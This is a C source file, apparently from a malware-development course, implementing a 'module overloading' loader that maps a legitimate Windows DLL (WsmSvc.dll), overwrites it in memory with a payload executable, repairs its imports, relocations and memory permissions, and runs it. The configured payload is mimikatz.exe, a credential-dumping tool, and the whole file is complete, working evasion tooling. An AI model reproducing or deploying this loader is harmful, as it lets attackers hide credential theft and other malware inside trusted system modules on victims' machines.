// @NUL0x4C | @mrd0x : MalDevAcademy

#include <Windows.h>
#include <stdio.h>


#include "Structs.h"

//----------------------------------------------------------------------------------------------------------------------------------------------------------

#define PRNT_WN_ERR(szWnApiName)			printf("[!] %ws Failed With Error: %d \n", szWnApiName, GetLastError());
#define PRNT_NT_ERR(szNtApiName, NtErr)		printf("[!] %ws Failed With Error: 0x%0.8X \n", szNtApiName, NtErr);

#define DELETE_HANDLE(H)								\
	if (H != NULL && H != INVALID_HANDLE_VALUE){		\
		CloseHandle(H);									\
		H = NULL;										\
	}


#define DELETE_PNTR(PNTR)								\
	if (PNTR != NULL){									\
		HeapFree(GetProcessHeap(), 0x00, PNTR);			\
		PNTR = NULL;									\
	}


#define GET_FILENAME(path) (wcsrchr(path, L'\\') ? wcsrchr(path, L'\\') + 1 : path)

//----------------------------------------------------------------------------------------------------------------------------------------------------------

typedef BOOL(WINAPI* DLLMAIN)(HINSTANCE, DWORD, LPVOID);
typedef BOOL(WINAPI* MAIN)();

//----------------------------------------------------------------------------------------------------------------------------------------------------------

typedef struct _NTAPIFP
{
	fnNtCreateSection				pNtCreateSection;
	fnNtMapViewOfSection			pNtMapViewOfSection;
	fnNtCreateThreadEx				pNtCreateThreadEx;

} NTAPIFP, * PNTAPIFP;


typedef struct _PE_HDRS
{
	PBYTE					pFileBuffer;
	DWORD					dwFileSize;

	PIMAGE_NT_HEADERS		pImgNtHdrs;
	PIMAGE_SECTION_HEADER	pImgSecHdr;

	PIMAGE_DATA_DIRECTORY	pEntryImportDataDir;
	PIMAGE_DATA_DIRECTORY	pEntryBaseRelocDataDir;
	PIMAGE_DATA_DIRECTORY	pEntryTLSDataDir;
	PIMAGE_DATA_DIRECTORY	pEntryExceptionDataDir;
	PIMAGE_DATA_DIRECTORY	pEntryExportDataDir;

	BOOL					bIsDLLFile;
}PE_HDRS, * PPE_HDRS;


NTAPIFP		g_NtApi = { 0x00 };

//----------------------------------------------------------------------------------------------------------------------------------------------------------

BOOL ReadFileFromDisk(IN LPCWSTR szFileName, OUT PBYTE* ppBuffer, OUT PDWORD pdwFileSize) {

	HANDLE		hFile					= INVALID_HANDLE_VALUE;
	PBYTE		pBufer					= NULL;
	DWORD		dwFileSize				= 0x00,
				dwNumberOfBytesRead		= 0x00;

	if ((hFile = CreateFileW(szFileName, GENERIC_READ, 0x00, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL)) == INVALID_HANDLE_VALUE) {
		PRNT_WN_ERR(TEXT("CreateFileW"));
		goto _FUNC_CLEANUP;
	}

	if ((dwFileSize = GetFileSize(hFile, NULL)) == INVALID_FILE_SIZE) {
		PRNT_WN_ERR(TEXT("GetFileSize"));
		goto _FUNC_CLEANUP;
	}

	if ((pBufer = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, dwFileSize)) == NULL) {
		PRNT_WN_ERR(TEXT("HeapAlloc"));
		goto _FUNC_CLEANUP;
	}

	if (!ReadFile(hFile, pBufer, dwFileSize, &dwNumberOfBytesRead, NULL) || dwFileSize != dwNumberOfBytesRead) {
		PRNT_WN_ERR(TEXT("ReadFile"));
		goto _FUNC_CLEANUP;
	}

	*ppBuffer		= pBufer;
	*pdwFileSize	= dwFileSize;

_FUNC_CLEANUP:
	if (hFile != INVALID_HANDLE_VALUE)
		CloseHandle(hFile);
	if (!*ppBuffer && pBufer)
		HeapFree(GetProcessHeap(), 0x00, pBufer);
	return ((*ppBuffer != NULL) && (*pdwFileSize != 0x00)) ? TRUE : FALSE;
}

//----------------------------------------------------------------------------------------------------------------------------------------------------------

BOOL LoadDllFile(IN LPCWSTR szDllFilePath, OUT HMODULE* phModule, OUT PSIZE_T psImgSize) {

	HANDLE				hFile			= INVALID_HANDLE_VALUE,
						hSection		= NULL;
	NTSTATUS			STATUS			= STATUS_SUCCESS;
	ULONG_PTR			uMappedModule	= NULL;
	SIZE_T				sViewSize		= NULL;
	PIMAGE_NT_HEADERS   pImgNtHdrs		= NULL;

	if (!szDllFilePath || !phModule)
		return FALSE;

	if ((hFile = CreateFileW(szDllFilePath, GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL)) == INVALID_HANDLE_VALUE) {
		PRNT_WN_ERR(TEXT("CreateFileW"));
		goto _FUNC_CLEANUP;
	}

	if (!NT_SUCCESS((STATUS = g_NtApi.pNtCreateSection(&hSection, SECTION_ALL_ACCESS, NULL, 0x00, PAGE_READONLY, SEC_IMAGE, hFile)))) {
		PRNT_NT_ERR(TEXT("NtCreateSection"), STATUS);
		goto _FUNC_CLEANUP;
	}

	DELETE_HANDLE(hFile);

	if (!NT_SUCCESS((STATUS = g_NtApi.pNtMapViewOfSection(hSection, NtCurrentProcess(), &uMappedModule, NULL, NULL, NULL, &sViewSize, ViewShare, NULL, PAGE_EXECUTE_READWRITE)))) {
		PRNT_NT_ERR(TEXT("NtMapViewOfSection"), STATUS);
		goto _FUNC_CLEANUP;
	}

	pImgNtHdrs = (PIMAGE_NT_HEADERS)(uMappedModule + ((PIMAGE_DOS_HEADER)uMappedModule)->e_lfanew);
	if (pImgNtHdrs->Signature != IMAGE_NT_SIGNATURE)
		goto _FUNC_CLEANUP;

	*phModule		= (HMODULE)uMappedModule;
	*psImgSize		= (SIZE_T)pImgNtHdrs->OptionalHeader.SizeOfImage;

_FUNC_CLEANUP:
	DELETE_HANDLE(hFile);
	DELETE_HANDLE(hSection);
	return *phModule ? TRUE : FALSE;
}

//----------------------------------------------------------------------------------------------------------------------------------------------------------

BOOL InitializePeStruct(OUT PPE_HDRS pPeHdrs, IN PBYTE pFileBuffer, IN DWORD dwFileSize) {

	if (!pPeHdrs || !pFileBuffer || !dwFileSize)
		return FALSE;

	pPeHdrs->pFileBuffer	= pFileBuffer;
	pPeHdrs->dwFileSize		= dwFileSize;
	pPeHdrs->pImgNtHdrs		= (PIMAGE_NT_HEADERS)(pFileBuffer + ((PIMAGE_DOS_HEADER)pFileBuffer)->e_lfanew);

	if (pPeHdrs->pImgNtHdrs->Signature != IMAGE_NT_SIGNATURE)
		return FALSE;

	pPeHdrs->bIsDLLFile				= (pPeHdrs->pImgNtHdrs->FileHeader.Characteristics & IMAGE_FILE_DLL) ? TRUE : FALSE;
	pPeHdrs->pImgSecHdr				= IMAGE_FIRST_SECTION(pPeHdrs->pImgNtHdrs);
	pPeHdrs->pEntryImportDataDir	= &pPeHdrs->pImgNtHdrs->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT];
	pPeHdrs->pEntryBaseRelocDataDir = &pPeHdrs->pImgNtHdrs->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC];
	pPeHdrs->pEntryTLSDataDir		= &pPeHdrs->pImgNtHdrs->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_TLS];
	pPeHdrs->pEntryExceptionDataDir = &pPeHdrs->pImgNtHdrs->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXCEPTION];
	pPeHdrs->pEntryExportDataDir	= &pPeHdrs->pImgNtHdrs->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];

	return TRUE;
}

//--------------------------------------------------------------------------------------------------------------------------------------------------------------------------

BOOL FixImportAddressTable(IN PIMAGE_DATA_DIRECTORY pEntryImportDataDir, IN PBYTE pPeBaseAddress) {

	PIMAGE_IMPORT_DESCRIPTOR	pImgDescriptor = NULL;

	for (SIZE_T i = 0; i < pEntryImportDataDir->Size; i += sizeof(IMAGE_IMPORT_DESCRIPTOR)) {

		pImgDescriptor = (PIMAGE_IMPORT_DESCRIPTOR)(pPeBaseAddress + pEntryImportDataDir->VirtualAddress + i);
		if (pImgDescriptor->OriginalFirstThunk == NULL && pImgDescriptor->FirstThunk == NULL)
			break;

		LPSTR		cDllName					= (LPSTR)(pPeBaseAddress + pImgDescriptor->Name);
		ULONG_PTR	uOriginalFirstThunkRVA		= pImgDescriptor->OriginalFirstThunk;
		ULONG_PTR	uFirstThunkRVA				= pImgDescriptor->FirstThunk;
		SIZE_T		ImgThunkSize				= 0x00;	
		HMODULE		hModule						= NULL;

		if (!(hModule = LoadLibraryA(cDllName))) {
			PRNT_WN_ERR(TEXT("LoadLibraryA"));
			return FALSE;
		}

		while (TRUE) {

			PIMAGE_THUNK_DATA			pOriginalFirstThunk		= (PIMAGE_THUNK_DATA)(pPeBaseAddress + uOriginalFirstThunkRVA + ImgThunkSize);
			PIMAGE_THUNK_DATA			pFirstThunk				= (PIMAGE_THUNK_DATA)(pPeBaseAddress + uFirstThunkRVA + ImgThunkSize);
			PIMAGE_IMPORT_BY_NAME		pImgImportByName		= NULL;
			ULONG_PTR					pFuncAddress			= NULL;

			if (pOriginalFirstThunk->u1.Function == NULL && pFirstThunk->u1.Function == NULL) {
				break;
			}

			if (IMAGE_SNAP_BY_ORDINAL(pOriginalFirstThunk->u1.Ordinal)) {
				if (!(pFuncAddress	= (ULONG_PTR)GetProcAddress(hModule, IMAGE_ORDINAL(pOriginalFirstThunk->u1.Ordinal)))) {
					printf("[!] Could Not Import !%s#%d \n", cDllName, (int)pOriginalFirstThunk->u1.Ordinal);
					return FALSE;
				}
			}
			else {
				pImgImportByName	= (PIMAGE_IMPORT_BY_NAME)(pPeBaseAddress + pOriginalFirstThunk->u1.AddressOfData);
				if (!(pFuncAddress	= (ULONG_PTR)GetProcAddress(hModule, pImgImportByName->Name))) {
					printf("[!] Could Not Import !%s.%s \n", cDllName, pImgImportByName->Name);
					return FALSE;
				}
			}

			pFirstThunk->u1.Function	= (ULONGLONG)pFuncAddress;
			ImgThunkSize				+= sizeof(IMAGE_THUNK_DATA);
		}
	}

	return TRUE;
}

//--------------------------------------------------------------------------------------------------------------------------------------------------------------------------

BOOL FixReloc(IN PIMAGE_DATA_DIRECTORY pEntryBaseRelocDataDir, IN ULONG_PTR pPeBaseAddress, IN ULONG_PTR pPreferableAddress) {

	PIMAGE_BASE_RELOCATION	pImgBaseRelocation	= (pPeBaseAddress + pEntryBaseRelocDataDir->VirtualAddress);
	ULONG_PTR				uDeltaOffset		= pPeBaseAddress - pPreferableAddress;
	PBASE_RELOCATION_ENTRY	pBaseRelocEntry		= NULL;

	while (pImgBaseRelocation->VirtualAddress) {

		pBaseRelocEntry = (PBASE_RELOCATION_ENTRY)(pImgBaseRelocation + 1);

		while ((PBYTE)pBaseRelocEntry != (PBYTE)pImgBaseRelocation + pImgBaseRelocation->SizeOfBlock) {
			switch (pBaseRelocEntry->Type) {
				case IMAGE_REL_BASED_DIR64:
					*((ULONG_PTR*)(pPeBaseAddress + pImgBaseRelocation->VirtualAddress + pBaseRelocEntry->Offset)) += uDeltaOffset;
					break;
				case IMAGE_REL_BASED_HIGHLOW:
					*((DWORD*)(pPeBaseAddress + pImgBaseRelocation->VirtualAddress + pBaseRelocEntry->Offset)) += (DWORD)uDeltaOffset;
					break;
				case IMAGE_REL_BASED_HIGH:
					*((WORD*)(pPeBaseAddress + pImgBaseRelocation->VirtualAddress + pBaseRelocEntry->Offset)) += HIWORD(uDeltaOffset);
					break;
				case IMAGE_REL_BASED_LOW:
					*((WORD*)(pPeBaseAddress + pImgBaseRelocation->VirtualAddress + pBaseRelocEntry->Offset)) += LOWORD(uDeltaOffset);
					break;
				case IMAGE_REL_BASED_ABSOLUTE:
					break;
				default:
					printf("[!] Unknown relocation type: %d | Offset: 0x%08X \n", pBaseRelocEntry->Type, pBaseRelocEntry->Offset);
					return FALSE;
			}
			pBaseRelocEntry++;
		}

		pImgBaseRelocation = (PIMAGE_BASE_RELOCATION)pBaseRelocEntry;
	}

	return TRUE;
}

//--------------------------------------------------------------------------------------------------------------------------------------------------------------------------

BOOL FixMemPermissions(IN ULONG_PTR pPeBaseAddress, IN PIMAGE_NT_HEADERS pImgNtHdrs, IN PIMAGE_SECTION_HEADER pImgSecHdr) {


	for (DWORD i = 0; i < pImgNtHdrs->FileHeader.NumberOfSections; i++) {
	
		DWORD	dwProtection	= 0x00,
				dwOldProtection = 0x00;

		if (!pImgSecHdr[i].SizeOfRawData || !pImgSecHdr[i].VirtualAddress)
			continue;

		if (pImgSecHdr[i].Characteristics & IMAGE_SCN_MEM_WRITE)
			dwProtection = PAGE_WRITECOPY;

		if (pImgSecHdr[i].Characteristics & IMAGE_SCN_MEM_READ)
			dwProtection = PAGE_READONLY;

		if ((pImgSecHdr[i].Characteristics & IMAGE_SCN_MEM_WRITE) && (pImgSecHdr[i].Characteristics & IMAGE_SCN_MEM_READ))
			dwProtection = PAGE_READWRITE;

		if (pImgSecHdr[i].Characteristics & IMAGE_SCN_MEM_EXECUTE)
			dwProtection = PAGE_EXECUTE;

		if ((pImgSecHdr[i].Characteristics & IMAGE_SCN_MEM_EXECUTE) && (pImgSecHdr[i].Characteristics & IMAGE_SCN_MEM_WRITE))
			dwProtection = PAGE_EXECUTE_WRITECOPY;

		if ((pImgSecHdr[i].Characteristics & IMAGE_SCN_MEM_EXECUTE) && (pImgSecHdr[i].Characteristics & IMAGE_SCN_MEM_READ))
			dwProtection = PAGE_EXECUTE_READ;

		if ((pImgSecHdr[i].Characteristics & IMAGE_SCN_MEM_EXECUTE) && (pImgSecHdr[i].Characteristics & IMAGE_SCN_MEM_WRITE) && (pImgSecHdr[i].Characteristics & IMAGE_SCN_MEM_READ))
			dwProtection = PAGE_EXECUTE_READWRITE;

		if (!VirtualProtect((PVOID)(pPeBaseAddress + pImgSecHdr[i].VirtualAddress), pImgSecHdr[i].SizeOfRawData, dwProtection, &dwOldProtection)) {
			PRNT_WN_ERR(TEXT("VirtualProtect"));
			return FALSE;
		}
	}

	return TRUE;
}

//--------------------------------------------------------------------------------------------------------------------------------------------------------------------------

BOOL OverWriteSacrificialDll(IN ULONG_PTR uMappedDll, IN SIZE_T sMappedImgSize, IN ULONG_PTR uPePayload, IN SIZE_T sPePayloadSize) {

	DWORD	dwOldProtection		= 0x00;

	if (!uMappedDll || !uPePayload || !sPePayloadSize)
		return FALSE;

	// Both should start with "MZ" (DOS Header)
	if (*(unsigned short*)uMappedDll != *(unsigned short*)uPePayload)
		return FALSE;

	// Allow writing to the sacrificial dll
	if (!VirtualProtect(uMappedDll, sMappedImgSize, PAGE_READWRITE, &dwOldProtection)) {
		PRNT_WN_ERR(TEXT("VirtualProtect"));
		return FALSE;
	}

	printf("[i] Overwriting Sacrificial DLL ... ");

	// Overwriting 
	memset(uMappedDll, 0x00, sMappedImgSize);
	memcpy(uMappedDll, uPePayload, sPePayloadSize);

	printf("[+] DONE \n");

	return TRUE;
}

//--------------------------------------------------------------------------------------------------------------------------------------------------------------------------

BOOL ModuleOverLoad(IN LPCWSTR szSacrificialDllName, IN PPE_HDRS pPeHdrs) {

	ULONG_PTR	uMappedDll			= NULL;
	SIZE_T		sMappedImgSize		= NULL;
	PBYTE		pPeBaseAddress		= NULL,
				pPeEntryPnt			= NULL;
	DWORD		dwOldProtection		= 0x00;

	if (!szSacrificialDllName || !pPeHdrs)
		return FALSE;

	// Load the sacrificial dll
	if (!LoadDllFile(szSacrificialDllName, &uMappedDll, &sMappedImgSize))
		return FALSE;

	printf("[i] Sacrificial DLL [%ws] Is Loaded At [ 0x%p ] Of Size [ %d ]\n", GET_FILENAME(szSacrificialDllName), (void*)uMappedDll, (int)sMappedImgSize);

	// If the sacrificial dll size is less than that of the payload's
	if (sMappedImgSize < pPeHdrs->pImgNtHdrs->OptionalHeader.SizeOfImage)
		return FALSE;

	// Allocate a temporary buffer to copy the PE payload
	if ((pPeBaseAddress = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, pPeHdrs->pImgNtHdrs->OptionalHeader.SizeOfImage)) == NULL) {
		PRNT_WN_ERR(TEXT("HeapAlloc"));
		return FALSE;
	}

	// Copy the PE payload to the temporary buffer
	memcpy(pPeBaseAddress, pPeHdrs->pFileBuffer, pPeHdrs->pImgNtHdrs->OptionalHeader.SizeOfHeaders);

	for (int i = 0; i < pPeHdrs->pImgNtHdrs->FileHeader.NumberOfSections; i++) {
		memcpy(
			(PVOID)(pPeBaseAddress + pPeHdrs->pImgSecHdr[i].VirtualAddress),
			(PVOID)((ULONG_PTR)pPeHdrs->pFileBuffer + pPeHdrs->pImgSecHdr[i].PointerToRawData),
			pPeHdrs->pImgSecHdr[i].SizeOfRawData
		);
	}

	// IAT Fixing
	if (!FixImportAddressTable(pPeHdrs->pEntryImportDataDir, pPeBaseAddress))
		goto _FUNC_FAILED;

	// Replace the sacrificial dll with the payload
	// uMappedDll is RW
	if (!OverWriteSacrificialDll(uMappedDll, sMappedImgSize, pPeBaseAddress, pPeHdrs->pImgNtHdrs->OptionalHeader.SizeOfImage))
		goto _FUNC_FAILED;

	// uMappedDll is now the base address of the payload
	// Free pPeBaseAddress
	DELETE_PNTR(pPeBaseAddress);

	// Fix Relocations
	if (!FixReloc(pPeHdrs->pEntryBaseRelocDataDir, uMappedDll, pPeHdrs->pImgNtHdrs->OptionalHeader.ImageBase))
		goto _FUNC_FAILED;

	// Fix Memory Permissions (Headers are RO)
	if (!VirtualProtect(uMappedDll, pPeHdrs->pImgNtHdrs->OptionalHeader.SizeOfHeaders, PAGE_READONLY, &dwOldProtection)) {
		PRNT_WN_ERR(TEXT("VirtualProtect"));
		goto _FUNC_FAILED;
	}

	// Fix Memory Permissions 
	if (!FixMemPermissions(uMappedDll, pPeHdrs->pImgNtHdrs, pPeHdrs->pImgSecHdr))
		goto _FUNC_FAILED;

	// Get the payload entry point
	pPeEntryPnt = (PBYTE)(uMappedDll + pPeHdrs->pImgNtHdrs->OptionalHeader.AddressOfEntryPoint);
	printf("[i] Payload Entry Point: 0x%p \n", pPeEntryPnt);

	// Execute the payload
	// If dll
	if (pPeHdrs->bIsDLLFile) {
		DLLMAIN	pDllMain = (DLLMAIN)pPeEntryPnt;
		return pDllMain((HINSTANCE)uMappedDll, DLL_PROCESS_ATTACH, NULL);
	}
	// If exe
	MAIN pMain = (MAIN)pPeEntryPnt;
	return pMain();

_FUNC_FAILED:
	DELETE_PNTR(pPeBaseAddress);
	return FALSE;
}

//----------------------------------------------------------------------------------------------------------------------------------------------------------


#define SACRIFICAL_DLL	L"C:\\Windows\\System32\\WsmSvc.dll"
#define PAYLOAD_PE		L"C:\\Users\\Admin\\Desktop\\Payloads\\mimikatz.exe"

int main() {

	HMODULE		hNtdll			= NULL;
	PBYTE		pFileBuffer		= NULL;
	DWORD		dwFileSize		= 0x00;
	PE_HDRS		PeHdrStruct		= { 0x00 };

	if (!(hNtdll = GetModuleHandle(TEXT("NTDLL"))))
		return -1;

	g_NtApi.pNtCreateSection	= (fnNtCreateSection)GetProcAddress(hNtdll, "NtCreateSection");
	g_NtApi.pNtMapViewOfSection = (fnNtMapViewOfSection)GetProcAddress(hNtdll, "NtMapViewOfSection");
	g_NtApi.pNtCreateThreadEx	= (fnNtCreateThreadEx)GetProcAddress(hNtdll, "NtCreateThreadEx");

	if (!g_NtApi.pNtCreateSection || !g_NtApi.pNtMapViewOfSection || !g_NtApi.pNtCreateThreadEx)
		return -1;

	if (!ReadFileFromDisk(PAYLOAD_PE, &pFileBuffer, &dwFileSize))
		return -1;

	printf("[i] %ws Is Loaded At [ 0x%p ] Of Size [ %d ]\n", GET_FILENAME(PAYLOAD_PE), pFileBuffer, dwFileSize);

	if (!InitializePeStruct(&PeHdrStruct, pFileBuffer, dwFileSize))
		return -1;

	if (!ModuleOverLoad(SACRIFICAL_DLL, &PeHdrStruct))
		return -1;

	WaitForSingleObject((HANDLE)-1, INFINITE);
	return 0;
}
